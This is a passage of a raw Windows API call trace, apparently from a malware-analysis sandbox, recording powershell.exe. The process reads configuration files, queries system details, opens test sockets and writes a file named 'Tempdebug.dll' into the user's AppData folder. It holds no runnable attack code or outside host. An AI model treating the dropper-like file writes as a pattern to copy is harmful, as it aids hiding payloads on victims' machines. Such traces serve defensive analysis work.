(lpFileName="C:\\Windows\\Microsoft.NET\\Framework\\v2.0.50727\\Config\\machine.config" (normalized: "c:\\windows\\microsoft.net\\framework\\v2.0.50727\\config\\machine.config"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x354 [0028.909] GetLastError () returned 0x0 [0028.909] GetFileType (hFile=0x354) returned 0x1 [0028.909] SetErrorMode (uMode=0x1) returned 0x1 [0028.909] GetFileType (hFile=0x354) returned 0x1 [0028.912] GetFileSize (in: hFile=0x354, lpFileSizeHigh=0x510e88c | out: lpFileSizeHigh=0x510e88c*=0x0) returned 0x65b3 [0028.912] GetLastError () returned 0x0 [0028.912] ReadFile (in: hFile=0x354, lpBuffer=0x23dd57c, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x510e844, lpOverlapped=0x0 | out: lpBuffer=0x23dd57c*, lpNumberOfBytesRead=0x510e844*=0x1000, lpOverlapped=0x0) returned 1 [0028.913] GetLastError () returned 0x0 [0028.916] ReadFile (in: hFile=0x354, lpBuffer=0x23dd57c, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x510e654, lpOverlapped=0x0 | out: lpBuffer=0x23dd57c*, lpNumberOfBytesRead=0x510e654*=0x1000, lpOverlapped=0x0) returned 1 [0028.916] GetLastError () returned 0x0 [0028.916] ReadFile (in: hFile=0x354, lpBuffer=0x23dd57c, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x510e4fc, lpOverlapped=0x0 | out: lpBuffer=0x23dd57c*, lpNumberOfBytesRead=0x510e4fc*=0x1000, lpOverlapped=0x0) returned 1 [0028.917] GetLastError () returned 0x0 [0028.917] ReadFile (in: hFile=0x354, lpBuffer=0x23dd57c, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x510e4fc, lpOverlapped=0x0 | out: lpBuffer=0x23dd57c*, lpNumberOfBytesRead=0x510e4fc*=0x1000, lpOverlapped=0x0) returned 1 [0028.917] GetLastError () returned 0x0 [0028.917] ReadFile (in: hFile=0x354, lpBuffer=0x23dd57c, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x510e4fc, lpOverlapped=0x0 | out: lpBuffer=0x23dd57c*, lpNumberOfBytesRead=0x510e4fc*=0x1000, lpOverlapped=0x0) returned 1 [0028.917] GetLastError () returned 0x0 [0028.923] ReadFile (in: hFile=0x354, lpBuffer=0x23dd57c, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x510e630, lpOverlapped=0x0 | out: lpBuffer=0x23dd57c*, lpNumberOfBytesRead=0x510e630*=0x1000, lpOverlapped=0x0) returned 1 [0028.923] GetLastError () returned 0x0 [0028.924] ReadFile (in: hFile=0x354, lpBuffer=0x23dd57c, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x510e4c4, lpOverlapped=0x0 | out: lpBuffer=0x23dd57c*, lpNumberOfBytesRead=0x510e4c4*=0x5b3, lpOverlapped=0x0) returned 1 [0028.924] GetLastError () returned 0x0 [0028.924] ReadFile (in: hFile=0x354, lpBuffer=0x23dd57c, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x510e5b0, lpOverlapped=0x0 | out: lpBuffer=0x23dd57c*, lpNumberOfBytesRead=0x510e5b0*=0x0, lpOverlapped=0x0) returned 1 [0028.924] GetLastError () returned 0x0 [0028.924] CloseHandle (hObject=0x354) returned 1 [0028.924] GetLastError () returned 0x0 [0028.927] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.config", nBufferLength=0x105, lpBuffer=0x510e730, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.config", lpFilePart=0x0) returned 0x3c [0028.927] GetLastError () returned 0x0 [0028.927] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.config", nBufferLength=0x105, lpBuffer=0x510e6e4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.config", lpFilePart=0x0) returned 0x3c [0028.927] GetLastError () returned 0x0 [0028.928] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x3249e8, nSize=0x104 | out: lpFilename="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.exe")) returned 0x39 [0028.928] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", nBufferLength=0x105, lpBuffer=0x510e768, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", lpFilePart=0x0) returned 0x39 [0028.928] GetLastError () returned 0x0 [0028.928] GetCurrentProcess () returned 0xffffffff [0028.928] GetLastError () returned 0x3f0 [0028.928] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x510eb0c | out: TokenHandle=0x510eb0c*=0x354) returned 1 [0028.928] GetLastError () returned 0x3f0 [0028.931] GetCurrentProcess () returned 0xffffffff [0028.931] GetLastError () returned 0x3f0 [0028.931] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x510eb0c | out: TokenHandle=0x510eb0c*=0x350) returned 1 [0028.931] GetLastError () returned 0x3f0 [0028.939] GetCurrentProcess () returned 0xffffffff [0028.940] GetLastError () returned 0x3f0 [0028.940] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x510e87c | out: TokenHandle=0x510e87c*=0x358) returned 1 [0028.940] GetLastError () returned 0x3f0 [0028.940] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.config" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.config"), fInfoLevelId=0x0, lpFileInformation=0x510e8bc | out: lpFileInformation=0x510e8bc*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0028.940] GetLastError () returned 0x2 [0028.940] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.config", nBufferLength=0x105, lpBuffer=0x510e3d4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.config", lpFilePart=0x0) returned 0x3c [0028.940] GetLastError () returned 0x2 [0028.940] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.config" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.config"), fInfoLevelId=0x0, lpFileInformation=0x510e8b8 | out: lpFileInformation=0x510e8b8*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0028.940] GetLastError () returned 0x2 [0028.940] GetCurrentProcess () returned 0xffffffff [0028.940] GetLastError () returned 0x3f0 [0028.940] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x510eb0c | out: TokenHandle=0x510eb0c*=0x35c) returned 1 [0028.940] GetLastError () returned 0x3f0 [0028.941] GetCurrentProcess () returned 0xffffffff [0028.941] GetLastError () returned 0x3f0 [0028.941] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x510eb0c | out: TokenHandle=0x510eb0c*=0x360) returned 1 [0028.941] GetLastError () returned 0x3f0 [0028.958] GetCurrentProcess () returned 0xffffffff [0028.958] GetLastError () returned 0x3f0 [0028.958] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x510e8e8 | out: TokenHandle=0x510e8e8*=0x364) returned 1 [0028.959] GetLastError () returned 0x3f0 [0028.982] GetCurrentProcess () returned 0xffffffff [0028.982] GetLastError () returned 0x3f0 [0028.982] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x510e8f8 | out: TokenHandle=0x510e8f8*=0x368) returned 1 [0028.982] GetLastError () returned 0x3f0 [0028.989] GetLongPathNameW (in: lpszShortPath="C:\\Users\\BGC6U8~1\\", lpszLongPath=0x510e7dc, cchBuffer=0x104 | out: lpszLongPath="C:\\Users\\BGC6u8Oy yXGxkR\\") returned 0x19 [0028.990] GetLastError () returned 0x3f0 [0028.990] GetFullPathNameW (in: lpFileName="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Tempdebug.dll", nBufferLength=0x105, lpBuffer=0x510e804, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Tempdebug.dll", lpFilePart=0x0) returned 0x34 [0028.990] GetLastError () returned 0x3f0 [0028.990] SetErrorMode (uMode=0x1) returned 0x1 [0028.990] CreateFileW (lpFileName="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Tempdebug.dll" (normalized: "c:\\users\\bgc6u8oy yxgxkr\\appdata\\local\\tempdebug.dll"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x388 [0028.990] GetLastError () returned 0x0 [0028.990] GetFileType (hFile=0x388) returned 0x1 [0028.990] SetErrorMode (uMode=0x1) returned 0x1 [0028.990] GetFileType (hFile=0x388) returned 0x1 [0028.991] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x3a8 [0028.991] GetLastError () returned 0x0 [0028.991] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x3ac [0028.991] GetLastError () returned 0x0 [0028.999] GetCurrentProcess () returned 0xffffffff [0028.999] GetLastError () returned 0x3f0 [0028.999] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x510e90c | out: TokenHandle=0x510e90c*=0x3b0) returned 1 [0028.999] GetLastError () returned 0x3f0 [0029.002] GetCurrentProcess () returned 0xffffffff [0029.002] GetLastError () returned 0x3f0 [0029.002] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x510e91c | out: TokenHandle=0x510e91c*=0x3b4) returned 1 [0029.002] GetLastError () returned 0x3f0 [0029.011] GetCurrentProcess () returned 0xffffffff [0029.011] GetLastError () returned 0x3f0 [0029.011] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x510e8e0 | out: TokenHandle=0x510e8e0*=0x3b8) returned 1 [0029.011] GetLastError () returned 0x3f0 [0029.013] GetCurrentProcess () returned 0xffffffff [0029.013] GetLastError () returned 0x3f0 [0029.013] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x510e8f0 | out: TokenHandle=0x510e8f0*=0x3bc) returned 1 [0029.013] GetLastError () returned 0x3f0 [0029.017] GetCurrentProcess () returned 0xffffffff [0029.017] GetLastError () returned 0x3f0 [0029.017] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x510ebe4 | out: TokenHandle=0x510ebe4*=0x3c0) returned 1 [0029.017] GetLastError () returned 0x3f0 [0029.026] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Windows NT\\CurrentVersion", ulOptions=0x0, samDesired=0x20019, phkResult=0x510dc44 | out: phkResult=0x510dc44*=0x3c4) returned 0x0 [0029.026] RegQueryValueExW (in: hKey=0x3c4, lpValueName="InstallationType", lpReserved=0x0, lpType=0x510dc8c, lpData=0x0, lpcbData=0x510dc88*=0x0 | out: lpType=0x510dc8c*=0x1, lpData=0x0, lpcbData=0x510dc88*=0xe) returned 0x0 [0029.026] RegQueryValueExW (in: hKey=0x3c4, lpValueName="InstallationType", lpReserved=0x0, lpType=0x510dc8c, lpData=0x3249e8, lpcbData=0x510dc88*=0xe | out: lpType=0x510dc8c*=0x1, lpData="Client", lpcbData=0x510dc88*=0xe) returned 0x0 [0029.027] RegCloseKey (hKey=0x3c4) returned 0x0 [0029.054] RasEnumConnectionsW (in: param_1=0x325c38, param_2=0x510ec5c, param_3=0x510ec60 | out: param_1=0x325c38, param_2=0x510ec5c, param_3=0x510ec60) returned 0x0 [0029.071] WSAStartup (in: wVersionRequired=0x202, lpWSAData=0x325c38 | out: lpWSAData=0x325c38) returned 0 [0029.076] GetLastError () returned 0x0 [0029.080] WSASocketW (af=2, type=2, protocol=0, lpProtocolInfo=0x0, g=0x0, dwFlags=0x0) returned 0x40c [0029.104] GetLastError () returned 0x0 [0029.104] setsockopt (s=0x40c, level=65535, optname=128, optval="\x01", optlen=4) returned -1 [0029.105] GetLastError () returned 0x273a [0029.105] closesocket (s=0x40c) returned 0 [0029.105] GetLastError () returned 0x0 [0029.105] WSASocketW (af=23, type=2, protocol=0, lpProtocolInfo=0x0, g=0x0, dwFlags=0x0) returned 0x40c [0029.116] GetLastError () returned 0x0 [0029.116] setsockopt (s=0x40c, level=65535, optname=128, optval="\x01", optlen=4) returned -1 [0029.116] GetLastError () returned 0x273a [0029.116] closesocket (s=0x40c) returned 0 [0029.116] GetLastError () returned 0x0 [0029.119] GetCurrentProcess () returned 0xffffffff [0029.119] GetLastError () returned 0x3f0 [0029.119] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x510e7c8 | out: TokenHandle=0x510e7c8*=0x40c) returned 1 [0029.119] GetLastError () returned 0x3f0 [0029.122] GetCurrentProcess () returned 0xffffffff [0029.122] GetLastError () returned 0x3f0 [0029.122] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x510e7d8 | out: TokenHandle=0x510e7d8*=0x410) returned 1 [0029.122] GetLastError () returned 0x3f0 [0029.133] GetCurrentProcessId () returned 0xa50 [0029.135] GetComputerNameW (in: lpBuffer=0x325c38, nSize=0x23fe6b4 | out: lpBuffer="F71GWAT", nSize=0x23fe6b4) returned 1 [0029.136] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SYSTEM\\CurrentControlSet\\Services\\.NET CLR Networking\\Performance", ulOptions=0x0, samDesired=0x20019, phkResult=0x510ea2c | out: phkResult=0x510ea2c*=0x414) returned 0x0 [0029.136] RegQueryValueExW (in: hKey=0x414, lpValueName="Library", lpReserved=0x0, lpType=0x510ea74, lpData=0x0, lpcbData=0x510ea70*=0x0 | out: lpType=0x510ea74*=0x1, lpData=0x0, lpcbData=0x510ea70*=0x1c) returned 0x0 [0029.136] RegQueryValueExW (in: hKey=0x414, lpValueName="Library", lpReserved=0x0, lpType=0x510ea74, lpData=0x325c38, lpcbData=0x510ea70*=0x1c | out: lpType=0x510ea74*=0x1, lpData="netfxperf.dll", lpcbData=0x510ea70*=0x1c) returned 0x0 [0029.136] RegQueryValueExW (in: hKey=0x414, lpValueName="IsMultiInstance", lpReserved=0x0, lpType=0x510ea74, lpData=0x0, lpcbData=0x510ea70*=0x0 | out: lpType=0x510ea74*=0x4, lpData=0x0, lpcbData=0x510ea70*=0x4) returned 0x0 [0029.137] RegQueryValueExW (in: hKey=0x414, lpValueName="IsMultiInstance", lpReserved=0x0, lpType=0x510ea74, lpData=0x510ea60, lpcbData=0x510ea70*=0x4 | out: lpType=0x510ea74*=0x4, lpData=0x510ea60*=0x1, lpcbData=0x510ea70*=0x4) returned 0x0 [0029.137] RegQueryValueExW (in: hKey=0x414, lpValueName="First Counter", lpReserved=0x0, lpType=0x510ea74, lpData=0x0, lpcbData=0x510ea70*=0x0 | out: lpType=0x510ea74*=0x4, lpData=0x0, lpcbData=0x510ea70*=0x4) returned 0x0 [0029.137] RegQueryValueExW (in: hKey=0x414, lpValueName="First Counter", lpReserved=0x0, lpType=0x510ea74, lpData=0x510ea60, lpcbData=0x510ea70*=0x4 | out: lpType=0x510ea74*=0x4, lpData=0x510ea60*=0x1040, lpcbData=0x510ea70*=0x4) returned 0x0 [0029.137] RegCloseKey (hKey=0x414) returned 0x0 [0029.139] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SYSTEM\\CurrentControlSet\\Services\\.net clr networking\\Performance", ulOptions=0x0, samDesired=0x20019, phkResult=0x510ea28 | out: phkResult=0x510ea28*=0x414) returned 0x0 [0029.139] RegQueryValueExW (in: hKey=0x414, lpValueName="CategoryOptions", lpReserved=0x0, lpType=0x510ea70, lpData=0x0, lpcbData=0x510ea6c*=0x0 | out: lpType=0x510ea70*=0x4, lpData=0x0, lpcbData=0x510ea6c*=0x4) returned 0x0 [0029.139] RegQueryValueExW (in: hKey=0x414, lpValueName="CategoryOptions", lpReserved=0x0, lpType=0x510ea70, lpData=0x510ea5c, lpcbData=0x510ea6c*=0x4 | out: lpType=0x510ea70*=0x4, lpData=0x510ea5c*=0x3, lpcbData=0x510ea6c*=0x4) returned 0x0 [0029.139] RegQueryValueExW (in: hKey=0x414, lpValueName="FileMappingSize", lpReserved=0x0, lpType=0x510ea70, lpData=0x0, lpcbData=0x510ea6c*=0x0 | out: lpType=0x510ea70*=0x4, lpData=0x0, lpcbData=0x510ea6c*=0x4) returned 0x0 [0029.139] RegQueryValueExW (in: hKey=0x414, lpValueName="FileMappingSize", lpReserved=0x0, lpType=0x510ea70, lpData=0x510ea5c, lpcbData=0x510ea6c*=0x4 | out: lpType=0x510ea70*=0x4, lpData=0x510ea5c*=0x20000, lpcbData=0x510ea6c*=0x4) returned 0x0 [0029.139] RegQueryValueExW (in: hKey=0x414, lpValueName="Counter Names", lpReserved=0x0, lpType=0x510ea70, lpData=0x0, lpcbData=0x510ea6c*=0x0 | out: lpType=0x510ea70*=0x3, lpData=0x0, lpcbData=0x510ea6c*=0xaa) returned 0x0 [0029.139] RegQueryValueExW (in: hKey=0x414, lpValueName="Counter Names", lpReserved=0x0, lpType=0x510ea70, lpData=0x2400de4, lpcbData=0x510ea6c*=0xaa | out: lpType=0x510ea70*=0x3, lpData=0x2400de4*, lpcbData=0x510ea6c*=0xaa) returned 0x0 [0029.142] ConvertStringSecurityDescriptorToSecurityDescriptorW () returned 0x1 [0029.142] GetLastError () returned 0x0 [0029.144] CreateFileMappingW (hFile=0xffffffff, lpFileMappingAttributes=0x2e8558, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x20000, lpName="Global\\netfxcustomperfcounters.1.0.net clr networking") returned 0x418 [0029.144] GetLastError () returned 0x0 [0029.146] MapViewOfFile (hFileMappingObject=0x418, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x4730000 [0029.148] VirtualQuery (in: lpAddress=0x4730000, lpBuffer=0x510ea40, dwLength=0x1c | out: lpBuffer=0x510ea40*(BaseAddress=0x4730000, AllocationBase=0x4730000, AllocationProtect=0x4, RegionSize=0x20000, State=0x1000, Protect=0x4, Type=0x40000)) returned 0x1c [0029.148] GetLastError () returned 0x0 [0029.148] LocalFree (hMem=0x31d6e8) returned 0x0 [0029.148] RegCloseKey (hKey=0x414) returned 0x0 [0029.149] GetVersionExW (in: lpVersionInformation=0x325c38*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x325c38*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0029.149] GetLastError () returned 0x0 [0029.150] GetVersionExW (in: lpVersionInformation=0x325c38*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x325c38*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0029.150] GetLastError () returned 0x0 [0029.151] CreateWellKnownSid (in: WellKnownSidType=0x11, DomainSid=0x0, pSid=0x240184c, cbSid=0x510ea20 | out: pSid=0x240184c*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0xb), cbSid=0x510ea20) returned 1 [0029.151] GetLastError () returned 0x0 [0029.153] CreateMutexW (lpMutexAttributes=0x2401984, bInitialOwner=0, lpName="Global\\.net clr networking") returned 0x414 [0029.153] GetLastError () returned 0x0 [0029.154] WaitForSingleObject (hHandle=0x414, dwMilliseconds=0x1f4) returned 0x0 [0029.154] GetLastError () returned 0x0 [0029.154] CreateWellKnownSid (in: WellKnownSidType=0x11, DomainSid=0x0, pSid=0x2401b58, cbSid=0x510e9e0 | out: pSid=0x2401b58*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0xb), cbSid=0x510e9e0) returned 1 [0029.154] GetLastError () returned 0x0 [0029.154] CreateMutexW (lpMutexAttributes=0x2401c68, bInitialOwner=0, lpName="Global\\.net clr networking") returned 0x0 [0029.154] GetLastError () returned 0x5 [0029.155] OpenMutexW (dwDesiredAccess=0x100001, bInheritHandle=0, lpName="Global\\.net clr networking") returned 0x41c [0029.155] GetLastError () returned 0x5 [0029.155] WaitForSingleObject (hHandle=0x41c, dwMilliseconds=0x1f4) returned 0x0 [0029.155] GetLastError () returned 0x5 [0029.155] ReleaseMutex (hMutex=0x41c) returned 1 [0029.155] GetLastError () returned 0x5 [0029.155] CloseHandle (hObject=0x41c) returned 1 [0029.155] GetLastError () returned 0x5 [0029.156] GetCurrentProcessId () returned 0xa50 [0029.156] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa50) returned 0x41c [0029.156] GetLastError () returned 0x5 [0029.158] GetProcessTimes (in: hProcess=0x41c, lpCreationTime=0x510e9e4, lpExitTime=0x510e9dc, lpKernelTime=0x510e9dc, lpUserTime=0x510e9dc | out: lpCreationTime=0x510e9e4, lpExitTime=0x510e9dc, lpKernelTime=0x510e9dc, lpUserTime=0x510e9dc) returned 1 [0029.158] GetLastError () returned 0x5 [0029.162] CloseHandle (hObject=0x41c) returned 1 [0029.162] GetLastError () returned 0x5 [0029.162] ReleaseMutex (hMutex=0x414) returned 1 [0029.162] GetLastError () returned 0x5 [0029.162] CloseHandle (hObject=0x414) returned 1 [0029.162] GetLastError () returned 0x5 [0029.162] CreateWellKnownSid (in: WellKnownSidType=0x11, DomainSid=0x0, pSid=0x240254c, cbSid=0x510ea20 | out: pSid=0x240254c*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0xb), cbSid=0x510ea20) returned 1 [0029.162] GetLastError () returned 0x5 [0029.162] CreateMutexW (lpMutexAttributes=0x240265c, bInitialOwner=0, lpName="Global\\.net clr networking") returned 0x414 [0029.162] GetLastError () returned 0x0 [0029.163] WaitForSingleObject (hHandle=0x414, dwMilliseconds=0x1f4) returned 0x0 [0029.163] GetLastError () returned 0x0 [0029.163] ReleaseMutex (hMutex=0x414) returned 1 [0029.163] GetLastError () returned 0x0 [0029.163] CloseHandle (hObject=0x414) returned 1 [0029.163] GetLastError () returned 0x0 [0029.163] CreateWellKnownSid (in: WellKnownSidType=0x11, DomainSid=0x0, pSid=0x2402dd0, cbSid=0x510ea20 | out: pSid=0x2402dd0*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0xb), cbSid=0x510ea20) returned 1 [0029.163] GetLastError () returned 0x0 [0029.163] CreateMutexW (lpMutexAttributes=0x2402ee0, bInitialOwner=0, lpName="Global\\.net clr networking") returned 0x414 [0029.163] GetLastError () returned 0x0 [0029.163] WaitForSingleObject (hHandle=0x414, dwMilliseconds=0x1f4) returned 0x0 [0029.163] GetLastError () returned 0x0 [0029.164] ReleaseMutex (hMutex=0x414) returned 1 [0029.164] GetLastError () returned 0x0 [0029.164] CloseHandle (hObject=0x414) returned 1 [0029.164] GetLastError () returned 0x0 [0029.164] CreateWellKnownSid (in: WellKnownSidType=0x11, DomainSid=0x0, pSid=0x2403658, cbSid=0x510ea20 | out: pSid=0x2403658*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0xb), cbSid=0x510ea20) returned 1 [0029.164] GetLastError () returned 0x0 [0029.164] CreateMutexW (lpMutexAttributes=0x2403768, bInitialOwner=0, lpName="Global\\.net clr networking") returned 0x414 [0029.164] GetLastError () returned 0x0 [0029.164] WaitForSingleObject (hHandle=0x414, dwMilliseconds=0x1f4) returned 0x0 [0029.164] GetLastError () returned 0x0 [0029.164] ReleaseMutex (hMutex=0x414) returned 1 [0029.164] GetLastError () returned 0x0 [0029.164] CloseHandle (hObject=0x414) returned 1 [0029.165] GetLastError () returned 0x0 [0029.165] CreateWellKnownSid (in: WellKnownSidType=0x11, DomainSid=0x0, pSid=0x2403ed8, cbSid=0x510ea20 | out: pSid=0x2403ed8*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0xb), cbSid=0x510ea20) returned 1 [0029.165] GetLastError () returned 0x0 [0029.165] CreateMutexW (lpMutexAttributes=0x2403fe8, bInitialOwner=0, lpName="Global\\.net clr networking") returned 0x414 [0029.165] GetLastError () returned 0x0 [0029.165] WaitForSingleObject (hHandle=0x414, dwMilliseconds=0x1f4) returned 0x0 [0029.165] GetLastError () returned 0x0 [0029.165] ReleaseMutex (hMutex=0x414) returned 1 [0029.165] GetLastError () returned 0x0 [0029.165] CloseHandle (hObject=0x414) returned 1 [0029.165] GetLastError () returned 0x0 [0029.165] CreateWellKnownSid (in: WellKnownSidType=0x11, DomainSid=0x0, pSid=0x2404754, cbSid=0x510ea18 | out: pSid=0x2404754*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0xb), cbSid=0x510ea18) returned 1 [0029.165] GetLastError () returned 0x0 [0029.166] CreateMutexW (lpMutexAttributes=0x2404864, bInitialOwner=0, lpName="Global\\.net clr networking") returned 0x414 [0029.166] GetLastError () returned 0x0 [0029.166] WaitForSingleObject (hHandle=0x414, dwMilliseconds=0x1f4) returned 0x0 [0029.166] GetLastError () returned 0x0 [0029.166] ReleaseMutex (hMutex=0x414) returned 1 [0029.166] GetLastError () returned 0x0 [0029.166] CloseHandle (hObject=0x414) returned 1 [0029.166] GetLastError () returned 0x0 [0029.166] CreateWellKnownSid (in: WellKnownSidType=0x11, DomainSid=0x0, pSid=0x2404fdc, cbSid=0x510ea18 | out: pSid=0x2404fdc*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0xb), cbSid=0x510ea18) returned 1 [0029.166] GetLastError () returned 0x0 [0029.167] CreateMutexW (lpMutexAttributes=0x24050ec, bInitialOwner=0, lpName="Global\\.net clr networking") returned 0x414 [0029.167] GetLastError () returned 0x0 [0029.167] WaitForSingleObject (hHandle=0x414, dwMilliseconds=0x1f4) returned 0x0 [0029.167] GetLastError () returned 0x0 [0029.167] ReleaseMutex (hMutex=0x414) returned 1 [0029.167] GetLastError () returned 0x0 [0029.167] CloseHandle (hObject=0x414) returned 1 [0029.167] GetLastError () returned 0x0 [0029.167] CreateWellKnownSid (in: WellKnownSidType=0x11, DomainSid=0x0, pSid=0x2405840, cbSid=0x510ea18 | out: pSid=0x2405840*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0xb), cbSid=0x510ea18) returned 1 [0029.167] GetLastError () returned 0x0 [0029.167] CreateMutexW (lpMutexAttributes=0x2405950, bInitialOwner=0, lpName="Global\\.net clr networking") returned 0x414 [0029.167] GetLastError () returned 0x0 [0029.167] WaitForSingleObject (hHandle=0x414, dwMilliseconds=0x1f4) returned 0x0 [0029.167] GetLastError () returned 0x0 [0029.168] ReleaseMutex (hMutex=0x414) returned 1 [0029.168] GetLastError () returned 0x0 [0029.168] CloseHandle (hObject=0x414) returned 1 [0029.168] GetLastError () returned 0x0 [0029.168] CreateWellKnownSid (in: WellKnownSidType=0x11, DomainSid=0x0, pSid=0x24060b4, cbSid=0x510ea18 | out: 